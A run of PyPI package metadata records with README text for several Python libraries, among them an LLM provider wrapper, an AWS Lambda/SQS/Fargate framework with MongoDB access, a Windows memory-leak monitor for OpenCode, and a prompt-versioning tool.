print(f"Invalid configuration: {e}")
except Exception as e:
print(f"API Error: {e}")
```
Each provider has its own exception hierarchy for detailed error handling. Import from provider modules:
```python
from jentis.llmkit.Openai import (
OpenAILLMError,
OpenAILLMAPIError,
OpenAILLMImportError,
OpenAILLMResponseError
)
try:
from jentis.llmkit.Openai import openai_llm
result = openai_llm(prompt="Test", model="gpt-4o", api_key="invalid")
except OpenAILLMAPIError as e:
print(f"API Error: {e}")
except OpenAILLMError as e:
print(f"General Error: {e}")
```
## Complete Example
```python
from jentis.llmkit import init_llm
def chat_with_llm(provider_name: str, user_message: str):
"""Simple chat function supporting multiple providers."""
try:
# Initialize LLM
llm = init_llm(
provider=provider_name,
model="gpt-4o" if provider_name == "openai" else "llama2",
api_key=None, # Uses environment variables
temperature=0.7,
max_tokens=1024
)
# Stream response
print(f"\n{provider_name.upper()} Response:\n")
for chunk in llm.generate_response_stream(user_message):
print(chunk, end='', flush=True)
print("\n")
except ValueError as e:
print(f"Configuration error: {e}")
except Exception as e:
print(f"Error: {e}")
# Use different providers
chat_with_llm("openai", "What is machine learning?")
chat_with_llm("anthropic", "Explain neural networks")
chat_with_llm("ollama", "What is Python?")
```
## Contributing
Contributions are welcome! Please feel free to submit a Pull Request. For major changes, please open an issue first to discuss what you would like to change.
1. Fork the repository
2. Create your feature branch (`git checkout -b feature/amazing-feature`)
3. Commit your changes (`git commit -m 'Add some amazing feature'`)
4. Push to the branch (`git push origin feature/amazing-feature`)
5. Open a Pull Request
## License
This project is licensed under the terms of the [LICENSE](../../LICENSE) file.
## Support
- **Issues**: [GitHub Issues](https://github.com/devXjitin/jentis-llmkit/issues)
- **Documentation**: [Project Docs](https://github.com/devXjitin/jentis-llmkit)
- **Community**: [Discussions](https://github.com/devXjitin/jentis-llmkit/discussions)
## Author
Built with care by the **J.E.N.T.I.S** team.
| text/markdown | J.E.N.T.I.S Team | null | null | null | MIT | llm, ai, openai, anthropic, google, gemini, claude, grok, ollama, azure, vertex-ai, chatgpt, gpt-4, machine-learning, nlp | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"google-generativeai>=0.3.0; extra == \"google\"",
"anthropic>=0.18.0; extra == \"anthropic\"",
"openai>=1.0.0; extra == \"openai\"",
"ollama>=0.1.0; extra == \"ollama\"",
"google-generativeai>=0.3.0; extra == \"all\"",
"anthropic>=0.18.0; extra == \"all\"",
"openai>=1.0.0; extra == \"all\"",
"ollama>=0.1.0; extra == \"all\"",
"google-generativeai>=0.3.0; extra == \"cloud\"",
"anthropic>=0.18.0; extra == \"cloud\"",
"openai>=1.0.0; extra == \"cloud\"",
"pytest>=7.0; extra == \"dev\"",
"black>=22.0; extra == \"dev\"",
"mypy>=0.990; extra == \"dev\"",
"ruff>=0.0.270; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/devXjitin/jentis-llmkit",
"Documentation, https://github.com/devXjitin/jentis-llmkit",
"Repository, https://github.com/devXjitin/jentis-llmkit",
"Bug Tracker, https://github.com/devXjitin/jentis-llmkit/issues",
"Discussions, https://github.com/devXjitin/jentis-llmkit/discussions"
] | twine/6.2.0 CPython/3.13.11 | 2026-02-20T06:50:41.186544 | jentis_llmkit-1.0.3.tar.gz | 42,388 | 7d/67/ba3f4dd4bde19584c90dbb56576e2f7e8c893cd9e0eef856333e320db520/jentis_llmkit-1.0.3.tar.gz | source | sdist | null | false | f95d1acd063eec45fb2ba8675b8e3209 | b1959063c8b227e8296e2f80dc0a921c6a34149fa4512327bda287a7c80fd08b | 7d67ba3f4dd4bde19584c90dbb56576e2f7e8c893cd9e0eef856333e320db520 | null | [] | 230 |
2.4 | numcodecs-pw-ratio | 0.2.0 | Meta codec for bounding the pointwise ratio error for the `numcodecs` buffer compression API | [](https://github.com/juntyr/numcodecs-pw-ratio/actions/workflows/ci.yml?query=branch%3Amain)
[](https://pypi.python.org/pypi/numcodecs-pw-ratio)
[](https://github.com/juntyr/numcodecs-pw-ratio/blob/main/LICENSE)
[](https://pypi.python.org/pypi/numcodecs-pw-ratio)
[](https://numcodecs-pw-ratio.readthedocs.io/en/latest/?badge=latest)
# numcodecs-pw-ratio
Meta codec for bounding the pointwise ratio error in the [`numcodecs`] buffer compression API.
[`numcodecs`]: https://numcodecs.readthedocs.io/en/stable/
## License
Licensed under the Mozilla Public License, Version 2.0 ([LICENSE](LICENSE) or https://www.mozilla.org/en-US/MPL/2.0/).
## Funding
The `numcodecs-pw-ratio` package has been developed as part of [ESiWACE3](https://www.esiwace.eu), the third phase of the Centre of Excellence in Simulation of Weather and Climate in Europe.
Funded by the European Union. This work has received funding from the European High Performance Computing Joint Undertaking (JU) under grant agreement No 101093054.
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"leb128~=1.0.8",
"numcodecs-combinators~=0.2.13",
"numcodecs<0.17,>=0.13.0",
"numpy~=2.0",
"typing-extensions~=4.6"
] | [] | [] | [] | [] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T06:50:29.577747 | numcodecs_pw_ratio-0.2.0-py3-none-any.whl | 12,839 | 6d/30/bee041b225b6e43c9cfe984022c7aceebb79b064ef79b52f08c58fcd886d/numcodecs_pw_ratio-0.2.0-py3-none-any.whl | py3 | bdist_wheel | null | false | 105493ebf336f9542d0d630843125523 | 71d53feb30debc563c89fbe2fb7054465d6e488efba1a7f79c0baef14ae45010 | 6d30bee041b225b6e43c9cfe984022c7aceebb79b064ef79b52f08c58fcd886d | MPL-2.0 | [
"LICENSE"
] | 272 |
2.4 | aws-python-helper | 0.29.0 | AWS Python Helper Framework | # AWS Python Framework
Mini-framework to create REST APIs, SQS Consumers, SNS Publishers, Fargate Tasks, and Standalone Lambdas with Python in AWS Lambda.
## 🚀 Features
- **Reusable single handler**: A single handler for all your API routes
- **Dynamic controller loading**: Routing based on convention
- **OOP structure**: Object-oriented programming for your code
- **Flexible MongoDB**: Direct access to multiple databases without models
- **SQS Consumers**: Same pattern to process SQS messages
- **SNS Publishers**: Same pattern to publish messages to SNS topics
- **Fargate Tasks**: Same pattern to run tasks in Fargate containers
- **Standalone Lambdas**: Create lambdas invocable directly with AWS SDK
- **Type hints**: Modern Python with type annotations
- **Async/await**: Full support for asynchronous operations
## 🔧 Installation
```bash
# Install dependencies
pip install -r requirements.txt
# Configure MongoDB URI
export MONGODB_URI="mongodb://localhost:27017"
```
## 📂 Project Structure
This framework follows a convention-based folder structure. Here's the recommended organization:
```
your-project/
└── src/
├── api/ # REST APIs
│ └── users/ # Resource folder (kebab-case)
│ ├── get.py # GET /users/123 -> UserGetAPI
│ ├── list.py # GET /users -> UserListAPI
│ ├── post.py # POST /users -> UserPostAPI
│ ├── put.py # PUT /users/123 -> UserPutAPI
│ └── delete.py # DELETE /users/123 -> UserDeleteAPI
│
├── consumer/ # SQS Consumers (direct files)
│ ├── user_created.py # user-created -> UserCreatedConsumer
│ ├── title_indexed.py # title-indexed -> TitleIndexedConsumer
│ └── order_processed.py # order-processed -> OrderProcessedConsumer
│
├── lambda/ # Standalone Lambdas (folders)
│ ├── generate-route/ # generate-route -> GenerateRouteLambda
│ │ └── main.py
│ ├── sync-carrier/ # sync-carrier -> SyncCarrierLambda
│ │ └── main.py
│ └── process-payment/ # process-payment -> ProcessPaymentLambda
│ └── main.py
│
└── task/ # Fargate Tasks (folders)
├── search-tax-by-town/ # search-tax-by-town -> SearchTaxByTownTask
│ ├── main.py # Entry point
│ └── task.py # Task class
└── process-data/ # process-data -> ProcessDataTask
├── main.py
└── task.py
```
### Naming Conventions
The framework uses automatic class name detection based on your folder/file structure:
| Type | Handler Name | File Path | Class Name |
|------|--------------|-----------|------------|
| **API** | N/A | `src/api/users/list.py` | `UserListAPI` |
| **Consumer** | `user-created` | `src/consumer/user_created.py` | `UserCreatedConsumer` |
| **Lambda** | `generate-route` | `src/lambda/generate-route/main.py` | `GenerateRouteLambda` |
| **Task** | `search-tax-by-town` | `src/task/search-tax-by-town/task.py` | `SearchTaxByTownTask` |
**Rules:**
- Handler names use **kebab-case** (e.g., `user-created`, `generate-route`)
- Consumer files use **snake_case** (e.g., `user_created.py`)
- Lambda folders use **kebab-case** (e.g., `generate-route/`)
- Task folders use **kebab-case** (e.g., `search-tax-by-town/`)
- Class names always use **PascalCase** with suffix (e.g., `UserCreatedConsumer`)
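The name conversion in the table can be sketched with a small helper (illustrative only; the framework's actual loader may differ):

```python
def to_class_name(handler_name: str, suffix: str) -> str:
    """Convert a kebab-case or snake_case handler name to a PascalCase class name."""
    parts = handler_name.replace("-", "_").split("_")
    return "".join(part.capitalize() for part in parts) + suffix

print(to_class_name("user-created", "Consumer"))    # UserCreatedConsumer
print(to_class_name("generate-route", "Lambda"))    # GenerateRouteLambda
print(to_class_name("search-tax-by-town", "Task"))  # SearchTaxByTownTask
```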
## 📝 Basic Usage
### Create an Endpoint
**1. Create your API class** in `src/api/constitutions/list.py`:
```python
from aws_python_helper.api.base import API
class ConstitutionListAPI(API):
async def process(self):
# Direct access to MongoDB
constitutions = await self.db.constitution_db.constitutions.find().to_list(100)
self.set_body(constitutions)
```
**2. The routing is automatic:**
- `GET /constitutions` → `src/api/constitutions/list.py`
- `GET /constitutions/123` → `src/api/constitutions/get.py`
- `POST /constitutions` → `src/api/constitutions/post.py`
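The convention above can be sketched as follows (a simplified illustration of the routing rules, not the framework's actual dispatcher):

```python
def route_to_module(method: str, path: str) -> str:
    """Map an HTTP method and path to the conventional controller module."""
    parts = [p for p in path.strip("/").split("/") if p]
    resource = parts[0]
    has_id = len(parts) > 1
    if method == "GET":
        action = "get" if has_id else "list"
    else:
        action = method.lower()  # post, put, delete
    return f"src/api/{resource}/{action}.py"

print(route_to_module("GET", "/constitutions"))      # src/api/constitutions/list.py
print(route_to_module("GET", "/constitutions/123"))  # src/api/constitutions/get.py
print(route_to_module("POST", "/constitutions"))     # src/api/constitutions/post.py
```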
**3. Configure the generic handler** (`src/handlers/api_handler.py`):
```python
from aws_python_helper.api.handler import api_handler
handler = api_handler
```
### Create an SQS Consumer
**1. Create your consumer** in `src/consumer/title_indexed.py`:
```python
from aws_python_helper.sqs.consumer_base import SQSConsumer
class TitleIndexedConsumer(SQSConsumer):
async def process_record(self, record):
body = self.parse_body(record)
# Your logic here
await self.db.constitution_db.titles.insert_one(body)
```
**2. Configure the handler** in `src/handlers/sqs_handler.py`:
```python
from aws_python_helper.sqs.handler import sqs_handler
# Create a handler for each consumer and export it
title_indexed_handler = sqs_handler('title-indexed')
__all__ = ['title_indexed_handler']
```
### Create a Standalone Lambda
Standalone lambdas are functions that can be invoked directly using the AWS SDK, without an HTTP endpoint. They're perfect for internal operations, integrations, and background processing tasks.
**Differences from APIs:**
- No API Gateway - invoked directly with AWS SDK
- No HTTP methods or routing
- Can be called from other lambdas, Step Functions, or any AWS service
- Perfect for internal microservices communication
**1. Create your lambda class** in `src/lambda/generate-route/main.py`:
```python
from aws_python_helper.lambda_standalone.base import Lambda
from datetime import datetime
class GenerateRouteLambda(Lambda):
async def validate(self):
# Validate input data
if 'shipping_id' not in self.data:
raise ValueError("shipping_id is required")
if not isinstance(self.data['shipping_id'], str):
raise TypeError("shipping_id must be a string")
async def process(self):
# Your business logic here
shipping_id = self.data['shipping_id']
# Access to MongoDB
shipping = await self.db.deliveries.shippings.find_one(
{'_id': shipping_id}
)
if not shipping:
raise ValueError(f"Shipping {shipping_id} not found")
# Create route
route = {
'shipping_id': shipping_id,
'carrier_id': shipping.get('carrier_id'),
'status': 'pending',
'created_at': datetime.utcnow()
}
result = await self.db.deliveries.routes.insert_one(route)
self.logger.info(f"Route created: {result.inserted_id}")
# Return result
return {
'route_id': str(result.inserted_id),
'shipping_id': shipping_id
}
```
**2. Configure the handler** in `src/handlers/lambda_handler.py`:
```python
from aws_python_helper.lambda_standalone.handler import lambda_handler
# Create a handler for each lambda and export it
generate_route_handler = lambda_handler('generate-route')
sync_carrier_handler = lambda_handler('sync-carrier')
process_payment_handler = lambda_handler('process-payment')
__all__ = [
'generate_route_handler',
'sync_carrier_handler',
'process_payment_handler'
]
```
**Note:** The handler name `'generate-route'` (kebab-case) will automatically look for:
- Folder: `src/lambda/generate-route/` (kebab-case)
- File: `main.py`
- Class: `GenerateRouteLambda`
**3. Invoke from another Lambda or API** using boto3:
```python
import boto3
import json
lambda_client = boto3.client('lambda')
# Invoke synchronously (RequestResponse)
response = lambda_client.invoke(
FunctionName='GenerateRouteLambda',
InvocationType='RequestResponse',
Payload=json.dumps({
'data': {
'shipping_id': '507f1f77bcf86cd799439011'
}
})
)
result = json.loads(response['Payload'].read())
# {'success': True, 'data': {'route_id': '...', 'shipping_id': '...'}}
if result['success']:
print(f"Route created: {result['data']['route_id']}")
else:
print(f"Error: {result['error']}")
```
**4. Invoke asynchronously** (fire and forget):
```python
# Invoke asynchronously (Event)
lambda_client.invoke(
FunctionName='GenerateRouteLambda',
InvocationType='Event', # Asynchronous
Payload=json.dumps({
'data': {
'shipping_id': '507f1f77bcf86cd799439011'
}
})
)
# Returns immediately without waiting for the result
```
**Naming Convention:**
| Lambda Name (kebab-case) | Folder | File | Class |
|--------------------------|--------|------|-------|
| `generate-route` | `src/lambda/generate-route/` | `main.py` | `GenerateRouteLambda` |
| `sync-carrier` | `src/lambda/sync-carrier/` | `main.py` | `SyncCarrierLambda` |
| `process-payment` | `src/lambda/process-payment/` | `main.py` | `ProcessPaymentLambda` |
| `send-notification` | `src/lambda/send-notification/` | `main.py` | `SendNotificationLambda` |
**Common Use Cases:**
- Internal microservices communication
- Background data processing
- Integration with external services
- Scheduled tasks (with EventBridge)
- Step Functions workflows
- Cross-service operations
### Publish to SNS
**1. Create your topic** in `src/topic/title_indexed.py`:
```python
from aws_python_helper.sns.publisher import SNSPublisher
import os
class TitleIndexedTopic(SNSPublisher):
def __init__(self):
super().__init__(
topic_arn=os.getenv('TITLE_INDEXED_SNS_TOPIC_ARN')
)
async def publish_message(self, constitution_id, title):
await self.publish({
'constitution_id': constitution_id,
'title': title,
'event_type': 'title_indexed'
})
```
**2. Use the topic** from anywhere:
```python
from src.topic.title_indexed import TitleIndexedTopic
# In a consumer, API or task
topic = TitleIndexedTopic()
await topic.publish_indexed('123', 'My Constitution')
```
### Run a Fargate Task
**1. Create your task** in `src/task/search-tax-by-town/task.py`:
```python
from aws_python_helper.fargate.task_base import FargateTask
class SearchTaxByTownTask(FargateTask):
async def execute(self):
town = self.require_env('TOWN')
self.logger.info(f"Processing town: {town}")
# Access to DB
        docs = await self.db.smart_data.address.find({'town': town}).to_list(length=None)
# Your logic here
for doc in docs:
# Process document
pass
```
**2. Create the entry point** in `src/task/search-tax-by-town/main.py`:
```python
from aws_python_helper.fargate.handler import fargate_handler
import sys
if __name__ == '__main__':
exit_code = fargate_handler('search-tax-by-town')
sys.exit(exit_code)
```
**3. Create the Dockerfile** in `src/task/search-tax-by-town/Dockerfile`:
```dockerfile
FROM python:3.10.12-slim
WORKDIR /app
# Install dependencies
COPY requirements.txt /app/framework_requirements.txt
COPY src/task/search-tax-by-town/requirements.txt /app/task_requirements.txt
RUN pip install -r /app/framework_requirements.txt && \
pip install -r /app/task_requirements.txt
# Copy code
COPY aws_python_helper /app/aws_python_helper
COPY config.py /app/config.py
COPY src/task /app/task
COPY src/task/search-tax-by-town/main.py /app/main.py
ENV PYTHONUNBUFFERED=1
CMD ["python", "main.py"]
```
**4. Invoke from Lambda**:
```python
from aws_python_helper.fargate.executor import FargateExecutor
def handler(event, context):
executor = FargateExecutor()
task_arn = executor.run_task(
'search-tax-by-town',
        envs={'TOWN': 'Norwalk', 'ONLY_TAX': 'true'}
)
return {'taskArn': task_arn}
```
## 🗄️ Access to MongoDB
The framework provides flexible access to multiple databases:
```python
class MyAPI(API):
async def process(self):
# Access to different databases
user = await self.db.users_db.users.find_one({'_id': user_id})
# Another database
await self.db.analytics_db.logs.insert_one({'action': 'view'})
# Multiple collections
titles = await self.db.constitution_db.titles.find().to_list(100)
articles = await self.db.constitution_db.articles.find().to_list(100)
```
## 🔄 Routing Convention
The framework uses convention over configuration for routing:
| Request | Loaded file |
|---------|----------------|
| `GET /users` | `api/users/list.py` |
| `GET /users/123` | `api/users/get.py` |
| `POST /users` | `api/users/post.py` |
| `PUT /users/123` | `api/users/put.py` |
| `DELETE /users/123` | `api/users/delete.py` |
| `GET /users/123/posts` | `api/users/posts/list.py` |
| `GET /users/123/posts/456` | `api/users/posts/get.py` |
**Logic:**
- The parts with **even indices** (0,2,4...) are **directories**
- The parts with **odd indices** (1,3,5...) are **path parameters**
- `GET` with **odd number of parts** → **list** method
- `GET` with **even number of parts** → **get** method
- Other methods use their name directly
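The rules above can be sketched in a few lines (illustrative only — the framework's actual router may differ):

```python
def resolve(method: str, path: str):
    """Map an HTTP method and path to a handler file plus path parameters,
    following the even/odd convention described above."""
    parts = [p for p in path.strip('/').split('/') if p]
    dirs = parts[0::2]    # even indices -> directories
    params = parts[1::2]  # odd indices -> path parameters
    if method == 'GET':
        handler = 'list' if len(parts) % 2 == 1 else 'get'
    else:
        handler = method.lower()
    return 'api/' + '/'.join(dirs) + f'/{handler}.py', params

print(resolve('GET', '/users'))                # ('api/users/list.py', [])
print(resolve('GET', '/users/123/posts/456'))  # ('api/users/posts/get.py', ['123', '456'])
print(resolve('DELETE', '/users/123'))         # ('api/users/delete.py', ['123'])
```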
## 🎯 Complete Example
```python
# src/api/constitutions/list.py
from aws_python_helper.api.base import API
class ConstitutionListAPI(API):
async def validate(self):
if 'limit' in self.data:
limit = int(self.data['limit'])
if limit > 1000:
raise ValueError("Limit cannot exceed 1000")
async def process(self):
# Build filters
filters = {}
if 'country' in self.data:
filters['country'] = self.data['country']
# Query MongoDB
limit = int(self.data.get('limit', 100))
results = await self.db.constitution_db.constitutions.find(
filters
).limit(limit).to_list(limit)
# Count total
total = await self.db.constitution_db.constitutions.count_documents(filters)
# Register in analytics
await self.db.analytics_db.searches.insert_one({
'filters': filters,
'result_count': len(results)
})
# Response
self.set_body({
'data': results,
'total': total
})
self.set_header('X-Total-Count', str(total))
```
## 🔗 Integration Example: API + Standalone Lambda
Here's a complete example showing how an API can invoke a standalone lambda:
**Scenario:** An API endpoint that creates a shipping record and then asynchronously generates its route using a standalone lambda.
**1. The API endpoint** (`src/api/shippings/post.py`):
```python
from aws_python_helper.api.base import API
import boto3
import json
class ShippingPostAPI(API):
async def validate(self):
required_fields = ['customer_id', 'address', 'items']
for field in required_fields:
if field not in self.data:
raise ValueError(f"{field} is required")
async def process(self):
# Create shipping in database
shipping = {
'customer_id': self.data['customer_id'],
'address': self.data['address'],
'items': self.data['items'],
'status': 'pending',
'route_pending': True
}
result = await self.db.deliveries.shippings.insert_one(shipping)
shipping_id = str(result.inserted_id)
# Invoke standalone lambda asynchronously to generate route
lambda_client = boto3.client('lambda')
lambda_client.invoke(
FunctionName='GenerateRouteLambda',
InvocationType='Event', # Asynchronous
Payload=json.dumps({
'data': {'shipping_id': shipping_id}
})
)
self.set_code(201)
self.set_body({
'shipping_id': shipping_id,
'status': 'pending',
'message': 'Shipping created, route generation in progress'
})
```
**2. The standalone lambda** (`src/lambda/generate-route/main.py`):
```python
from aws_python_helper.lambda_standalone.base import Lambda
from bson import ObjectId
class GenerateRouteLambda(Lambda):
    async def validate(self):
        if 'shipping_id' not in self.data:
            raise ValueError("shipping_id is required")
    async def process(self):
        shipping_id = self.data['shipping_id']
        # Get shipping details (_id is stored as an ObjectId, but the
        # payload carries it as a string, so convert before querying)
        shipping = await self.db.deliveries.shippings.find_one(
            {'_id': ObjectId(shipping_id)}
        )
        if not shipping:
            raise ValueError(f"Shipping {shipping_id} not found")
        # Generate optimal route
        route = await self.calculate_optimal_route(shipping)
        # Save route
        route_result = await self.db.deliveries.routes.insert_one(route)
        # Update shipping
        await self.db.deliveries.shippings.update_one(
            {'_id': ObjectId(shipping_id)},
            {'$set': {
                'route_id': route_result.inserted_id,
                'route_pending': False,
                'status': 'scheduled'
            }}
        )
return {
'route_id': str(route_result.inserted_id),
'shipping_id': shipping_id
}
async def calculate_optimal_route(self, shipping):
# Your route calculation logic here
return {
'shipping_id': shipping['_id'],
'carrier_id': shipping.get('carrier_id'),
'estimated_duration': 60,
'status': 'pending'
}
```
**3. Configure handlers** (`src/handlers/lambda_handler.py`):
```python
from aws_python_helper.lambda_standalone.handler import lambda_handler
generate_route_handler = lambda_handler('generate-route')
__all__ = ['generate_route_handler']
```
**Benefits of this pattern:**
- API responds immediately (better UX)
- Route generation happens in the background
- Decoupled services (easier to maintain)
- Can retry lambda independently if it fails
- Scalable architecture
## 🔐 Environment Variables
### MongoDB Configuration
The framework supports two ways of configuring MongoDB:
#### Option 1: Full Connection String
```bash
# Full URI with credentials included
MONGODB_URI=mongodb+srv://user:password@cluster.mongodb.net/dbname?retryWrites=true&w=majority
# or
MONGO_DB_URI=mongodb+srv://user:password@cluster.mongodb.net/dbname
```
#### Option 2: Separate Components (Recommended for Terraform)
```bash
# Host without credentials
MONGO_DB_HOST=mongodb+srv://cluster.mongodb.net
# Separate credentials (more secure)
MONGO_DB_USER=admin
MONGO_DB_PASSWORD=my-secure-password
# Optional
MONGO_DB_NAME=my_database
MONGO_DB_OPTIONS=retryWrites=true&w=majority
```
**Advantages of using separate components:**
- ✅ Better security: credentials kept separate from the host
- ✅ Easy integration with Terraform/AWS Secrets Manager
- ✅ Passwords with special characters are handled automatically
- ✅ More flexible across environments
The framework automatically:
1. URL-encodes the password (handles `@`, `:`, `/`, etc.)
2. Builds the full URI
3. Initializes the connection
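That assembly step can be sketched as follows (illustrative only — `build_mongo_uri` is a hypothetical helper, not the framework's actual API):

```python
from urllib.parse import quote_plus

def build_mongo_uri(host, user, password, db_name=None, options=None):
    """Assemble a MongoDB URI from separate components, URL-encoding
    the credentials so characters like @, : and / stay safe."""
    scheme, _, bare_host = host.partition('://')
    uri = f"{scheme}://{quote_plus(user)}:{quote_plus(password)}@{bare_host}"
    if db_name:
        uri += f"/{db_name}"
    if options:
        uri += f"?{options}"
    return uri

uri = build_mongo_uri(
    "mongodb+srv://cluster.mongodb.net",
    "admin",
    "p@ss:w/rd",
    db_name="my_database",
    options="retryWrites=true&w=majority",
)
# mongodb+srv://admin:p%40ss%3Aw%2Frd@cluster.mongodb.net/my_database?retryWrites=true&w=majority
```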
### Terraform Example
```hcl
environment_variables = {
MONGO_DB_HOST = module.mongodb.connection_string
MONGO_DB_USER = module.mongodb.database_user
MONGO_DB_PASSWORD = module.mongodb.database_password
}
```
## 📊 Advanced Features
### SNS Publisher - Batch Publishing
```python
# Publish multiple messages
topic = TitleIndexedTopic()
await topic.publish_batch_indexed([
{'constitution_id': 'id1', 'title': 'Title 1'},
{'constitution_id': 'id2', 'title': 'Title 2'},
{'constitution_id': 'id3', 'title': 'Title 3'}
])
```
### Fargate - Run multiple tasks
```python
executor = FargateExecutor()
task_arns = executor.run_task_batch(
'search-tax-by-town',
[
{'town': 'Norwalk'},
{'town': 'Stamford'},
{'town': 'Bridgeport'}
]
)
```
### Fargate - Check task status
```python
executor = FargateExecutor()
task_arn = executor.run_task('my-task', {'param': 'value'})
# Check task status
status = executor.get_task_status(task_arn)
print(f"Status: {status['status']}")
print(f"Started at: {status['started_at']}")
```
### SNS - Message Attributes
```python
# Publish with attributes for SNS filtering
topic = ConstitutionCreatedTopic()
await topic.publish_created(
constitution_id='123',
title='New Constitution',
country='Ecuador',
year=2023,
created_by='user_456',
attributes={'priority': 'high', 'region': 'latam'}
)
```
## 🤝 Contributing
If you find bugs or want to add features, please create a PR!
## 📄 License
MIT
| text/markdown | null | Fabian Claros <neufabiae@gmail.com> | null | null | MIT | aws, python, framework, helper, mongodb, sqs, sns, fargate, lambda | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"motor==3.3.2",
"pymongo==4.6.1",
"bcrypt>=4.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/fabiae/aws-python-framework",
"Source Code, https://github.com/fabiae/aws-python-framework",
"Bug Tracker, https://github.com/fabiae/aws-python-framework/issues",
"Documentation, https://github.com/fabiae/aws-python-framework/blob/main/README.md"
] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T06:49:43.561897 | aws_python_helper-0.29.0.tar.gz | 44,754 | e3/1b/97241cd380a5a31dd9a28a7fd1345a6f8ce33bcb943ccace539b754e8b6c/aws_python_helper-0.29.0.tar.gz | source | sdist | null | false | b25141ead8c7262adfe64ec51b57bfa8 | 420702cf5355dbf3b6b557d757832efeef23ac5d9b028a8ea430299bd29934b8 | e31b97241cd380a5a31dd9a28a7fd1345a6f8ce33bcb943ccace539b754e8b6c | null | [] | 232 |
2.4 | opencode-mem-guard | 0.4.3 | OpenCode memory leak monitor & zombie process reclaimer with system tray UI | # OpenCode MemGuard
🛡️ A memory-leak monitor and zombie-process reclaimer for OpenCode.
A 360-style desktop floating ball plus a system tray icon: monitors Node.js process memory in real time and automatically reclaims zombie processes.
## Features
- **360-style floating ball**: shows RAM usage in real time; supports dragging, edge snapping, and hover-to-expand details
- **System tray**: right-click menu to toggle auto-reclaim and start-on-boot, and to view logs
- **Memory-leak detection**: sliding-window linear regression automatically identifies upward memory trends
- **Zombie-process reclaiming**: detects and terminates idle node.exe processes to free memory
- **Live log viewer**: dark-themed window with real-time scrolling monitor logs
- **Start on boot**: autostart management via the Windows registry
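The leak detector fits a least-squares line over a sliding window of memory samples and flags a persistently positive slope. A minimal sketch of that idea (not the package's actual implementation):

```python
def leak_slope(samples):
    """Least-squares slope of memory samples (MB) taken at a fixed interval."""
    n = len(samples)
    mean_x = (n - 1) / 2                 # x values are just 0..n-1
    mean_y = sum(samples) / n
    num = sum((x - mean_x) * (y - mean_y) for x, y in enumerate(samples))
    den = sum((x - mean_x) ** 2 for x in range(n))
    return num / den if den else 0.0

window = [120.0, 123.5, 127.2, 131.0, 134.9, 138.6]  # RSS samples, MB
if leak_slope(window) > 1.0:  # growing faster than 1 MB per interval
    print("possible leak: memory trending upward")
```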
## Requirements
- Windows 10/11
- Python >= 3.10
## Installation
```bash
pip install opencode-mem-guard
```
## Usage
```bash
# Standard mode: floating ball + tray
opencode-mem-guard
# Run in the background (no console window; survives closing the terminal)
pythonw -m opencode_mem_guard
# Tray-only mode
opencode-mem-guard --no-ball
# Dry run (does not kill processes)
opencode-mem-guard --dry-run
```
## Options
| Option | Description |
|--------|-------------|
| `--no-ball` | Hide the floating ball |
| `--no-tray` | Hide the tray icon |
| `--no-reclaim` | Disable auto-reclaim |
| `--dry-run` | Dry-run mode |
| `-i, --interval` | Sampling interval in seconds (default: 5) |
| `--data-dir` | Data directory (default: `~/.opencode-mem-guard/data/`) |
## License
MIT
| text/markdown | null | Fiyen <623320480@qq.com>, "Claude (claude-opus-4-6)" <noreply@anthropic.com> | null | null | null | leak, memory, monitor, opencode, tray | [
"Development Status :: 4 - Beta",
"Environment :: Win32 (MS Windows)",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python :: 3",
"Topic :: System :: Monitoring"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"pillow>=10.0",
"psutil>=5.9",
"pystray>=0.19"
] | [] | [] | [] | [
"Homepage, https://github.com/fiyen/opencode-mem-guard"
] | twine/6.2.0 CPython/3.12.7 | 2026-02-20T06:49:39.411759 | opencode_mem_guard-0.4.3.tar.gz | 92,847 | d5/e2/58659bfeb5556a6f5c0918376bab8fdc1db29ad3129d35b34e3162902a85/opencode_mem_guard-0.4.3.tar.gz | source | sdist | null | false | fd233e54634992efad3f2b78b191cfaa | fc7a642668f004defb98fea62e9d6de9c86cb99c94ea68287e8327e002b876f3 | d5e258659bfeb5556a6f5c0918376bab8fdc1db29ad3129d35b34e3162902a85 | MIT | [] | 223 |
2.4 | llmpromptvault | 0.1.0 | Version, compare, and manage your LLM prompts. No API keys required. Bring your own model. | # PromptVault 🔐
> **Version and compare your LLM prompts. No API key required. Bring your own model.**
[](https://pypi.org/project/promptvault/)
[](https://www.python.org/)
[](LICENSE)
---
## What PromptVault Does
PromptVault is a **prompt management library** — not an LLM client. It does three things:
1. **Versions your prompts** — tracks every change like Git
2. **Logs responses** — stores what each prompt returned, with latency and token counts
3. **Compares prompts** — shows you side-by-side how two prompt versions perform
**PromptVault never calls any LLM.** You call your own model however you like — OpenAI, Claude, Gemini, Ollama, a local model, anything. You pass the response to PromptVault and it handles the rest.
---
## Installation
```bash
pip install llmpromptvault
```
Only one dependency: `pyyaml`. Everything else uses Python's standard library.
---
## Quick Start
```python
from promptvault import Prompt, Compare
# 1. Define two versions of a prompt
v1 = Prompt("summarize", template="Summarize this: {text}", version="v1")
v2 = Prompt("summarize", template="Summarize in 3 bullet points: {text}", version="v2")
# 2. YOU call your LLM (any model, any way you like)
r1 = your_llm(v1.render(text="Some article content..."))
r2 = your_llm(v2.render(text="Some article content..."))
